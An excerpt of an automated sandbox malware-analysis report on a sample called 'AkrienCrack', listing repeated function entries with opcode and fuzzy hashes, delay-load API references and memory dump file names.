              • Opcode ID: b99ba28244027bc99cbc693c988dd63d0ff3c8becefa22cd8d9d68d43d49d209
              • Instruction ID: bd7df15ee777887577bf6f60290a03243cfa974c47102f961fbfce3220f5356c
              • Opcode Fuzzy Hash: b99ba28244027bc99cbc693c988dd63d0ff3c8becefa22cd8d9d68d43d49d209
              • Instruction Fuzzy Hash: 55B0129226C101AD31286308AC46F3602CCC4C2B13330C2EABC0DE01C0D4405C0E0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2c0092d55c4a871d1e955ab926057de1382e5864046640a1ba488424aefdf609
              • Instruction ID: 080a63e851fc05055f50d112d1bba5797c8eb8c47f583509df4ad577849ec5ca
              • Opcode Fuzzy Hash: 2c0092d55c4a871d1e955ab926057de1382e5864046640a1ba488424aefdf609
              • Instruction Fuzzy Hash: C2B0129626C201AD31286308AD86F3B02CCD4C1B1333082EAB80DE00C0D4405C0C0D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8c7d3934176d931318c7919efc2b8041c1bb63ace2f952f2094f1f514e4b9ee9
              • Instruction ID: b82b46776ed22afb38d7f62f5bba4c55d82c09c4371bcffdabdbf2683b4e9551
              • Opcode Fuzzy Hash: 8c7d3934176d931318c7919efc2b8041c1bb63ace2f952f2094f1f514e4b9ee9
              • Instruction Fuzzy Hash: 70B0129626C301BD31282304AD96F3B02CCC4C1B1333087FAB80DF00D0D5405C4C4C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2f74565fce9f57409660724a0bd0140c1bc194cdb269312d1d2486518cb38ca0
              • Instruction ID: c18b238af46a6c21d8f6148c3f6afd43a1795980c653fc46c382ef3037837a25
              • Opcode Fuzzy Hash: 2f74565fce9f57409660724a0bd0140c1bc194cdb269312d1d2486518cb38ca0
              • Instruction Fuzzy Hash: 77B012F236C101AD312C6308AD46F3602CCC4C1B1333082EABC0EE00D0D4405D0D0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 1c6852c13ab439d9b034b4bdcdd3d01ad7316fb2613eb57959c52be5442ea810
              • Instruction ID: 149345d57412e13fab21c82ea9f4c3cd91d997b7aca64e982c77ad4cc1c0d0fc
              • Opcode Fuzzy Hash: 1c6852c13ab439d9b034b4bdcdd3d01ad7316fb2613eb57959c52be5442ea810
              • Instruction Fuzzy Hash: A1B012F226C101AD312C6309AC46F3602CCC4C1B1333082EAB80DE00D0D4405C0C0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 633c40a4cbc3db88c5d3e55508ef4676ae8f67b9a5514b00717dd5278ecb6fbd
              • Instruction ID: 1d7cf9fa9014af036e8c8b733b6a3ab3e046e57373a54b85267f5bda2c4637c7
              • Opcode Fuzzy Hash: 633c40a4cbc3db88c5d3e55508ef4676ae8f67b9a5514b00717dd5278ecb6fbd
              • Instruction Fuzzy Hash: 19B012F226C201AD31686308AC46F3602CCC4C1B1333083EAB81DE00D0D4405C4C0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f8dc02549682e3ec324e1c83ac5efa73045a9739b1e530ee23c851399ee78854
              • Instruction ID: 03fcf9348fffc12e9c2cd45cd1fd6eb1facb579079a4d38ca5b7ee3b60cccb86
              • Opcode Fuzzy Hash: f8dc02549682e3ec324e1c83ac5efa73045a9739b1e530ee23c851399ee78854
              • Instruction Fuzzy Hash: 3BB012F226C101AD31286308AC46F3602CCC4C2B13330C2EABC0DE00D0D4405C0D0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 75f8a725c632c8c631a1c50ebf3bed1fc3114b6f7cdda528e8341c53714a201d
              • Instruction ID: 403c0e4534b38f7b13c1ee70d958184574c10b7deec72e6bf394faa677a6985e
              • Opcode Fuzzy Hash: 75f8a725c632c8c631a1c50ebf3bed1fc3114b6f7cdda528e8341c53714a201d
              • Instruction Fuzzy Hash: 23B0129226C201AD31686308AC46F3602CCC4C1B13330C3EAB80DE01C0D4405C8D0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d6e56786eddfed0dcfdd1b0577973b4d512b572153d8cc7c236d91487bf98571
              • Instruction ID: bd62e1e95f4300ef916023031ca8c40aeccdea12a628e99f68671644d52a5968
              • Opcode Fuzzy Hash: d6e56786eddfed0dcfdd1b0577973b4d512b572153d8cc7c236d91487bf98571
              • Instruction Fuzzy Hash: CBB012923AC101AD312C6308AD46F3602CCC4C1B13330C2EABC0DE01C0D4405C0E0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b1d909ea0178c3e6a69fbab285f8444d0628a0716a4fdda9a184419b7e25caa1
              • Instruction ID: eb05c06e1577710816def422ea88e5a1cee35044b79e7c0bb00f3fb9e61e1215
              • Opcode Fuzzy Hash: b1d909ea0178c3e6a69fbab285f8444d0628a0716a4fdda9a184419b7e25caa1
              • Instruction Fuzzy Hash: 06B0129227D101AD31686308AC46F3602CEC8C1B1333082EAB80DE00C0D4405C0C0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0cbb4828ec08ee4003c4ee24cd3fc5c882adbda48fc39265b93016c070bcdd82
              • Instruction ID: 0ca2935abaa4248bb467082a63e73c77a881c9b064b969d061a47cdf3a20e268
              • Opcode Fuzzy Hash: 0cbb4828ec08ee4003c4ee24cd3fc5c882adbda48fc39265b93016c070bcdd82
              • Instruction Fuzzy Hash: 1DB0129226C101AD31286318AC46F3602CCC4C2B13330C2FABD0DE00C0D5405C0D0D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ab9f24d13917ccd3fb2df1fa351fa3c778b1d5e3aad5be40129d93ed935e5481
              • Instruction ID: a0794364b7e2772f582a6019f9ca3ebc8316c6399b1e6054cfeac2ce99c760a4
              • Opcode Fuzzy Hash: ab9f24d13917ccd3fb2df1fa351fa3c778b1d5e3aad5be40129d93ed935e5481
              • Instruction Fuzzy Hash: 62B012A626D201AD31A86308AC46F3602CEC4C1B1333083EAB80DE00C0D4405C4C0C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e80e91810e55e75e0de710f7d3e7292769d63d39cf3c24b49a8eb316324c3f40
              • Instruction ID: 298fc8a657e1ab8d4655cb4197a3901ca2afcf1959f6e911b45070d1ca123679
              • Opcode Fuzzy Hash: e80e91810e55e75e0de710f7d3e7292769d63d39cf3c24b49a8eb316324c3f40
              • Instruction Fuzzy Hash: 7DB0129226D101AD31686308AC46F3602CEC4C2B13330C2EABC0DE00C0D4405C0D1C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a42a3276ade48fe9de13950bdfc7fdef3447bc676333390bb8bdf770e964118b
              • Instruction ID: 6a0ca8a5b1ae595fc07f06c829752f2c965c73dcbd948a22ab7355f5c282dba8
              • Opcode Fuzzy Hash: a42a3276ade48fe9de13950bdfc7fdef3447bc676333390bb8bdf770e964118b
              • Instruction Fuzzy Hash: B0B012A236C101AD312C6308AD46F3602CCC4C1B1333082FABC0DE00C0D4405C0D0D31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e14f104fba4d2714dde9d1dca2d644f701b898afe7097917279a06ebde99e6d2
              • Instruction ID: 88be6fb7d6c639fbea60692438d68cb9de6e99efff22391202aa9c557041a526
              • Opcode Fuzzy Hash: e14f104fba4d2714dde9d1dca2d644f701b898afe7097917279a06ebde99e6d2
              • Instruction Fuzzy Hash: 40B0129226C101AD3138B3196C06F3F02CCC0C4B12330C7EBB90DC0048D4404C0D4C31
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 187b3f8394f18ec98fb5d9f696f6a505d65801ff138fe983c375bba51ab47c01
              • Instruction ID: 933c6c910e325a1228e3a81dbbafa61538bfe37680cc6761ab0166ac0f225b15
              • Opcode Fuzzy Hash: 187b3f8394f18ec98fb5d9f696f6a505d65801ff138fe983c375bba51ab47c01
              • Instruction Fuzzy Hash: CCB092A226C101AD2128A2196806F3A02C8C080B12320C2EAB809C0058D44448084831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d56ba47aa970c537a920374d51a44d72377d722861e0b036f8ee58634fb1dad4
              • Instruction ID: 2b8a5599de5ced14396013e073bec0f65e46c09e15ed2985c4589e0895a6571f
              • Opcode Fuzzy Hash: d56ba47aa970c537a920374d51a44d72377d722861e0b036f8ee58634fb1dad4
              • Instruction Fuzzy Hash: 1DB0129636C103AD312C53182D07F3702DCC0C0B12330C6DABD0DC0250D9404C0D4931
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
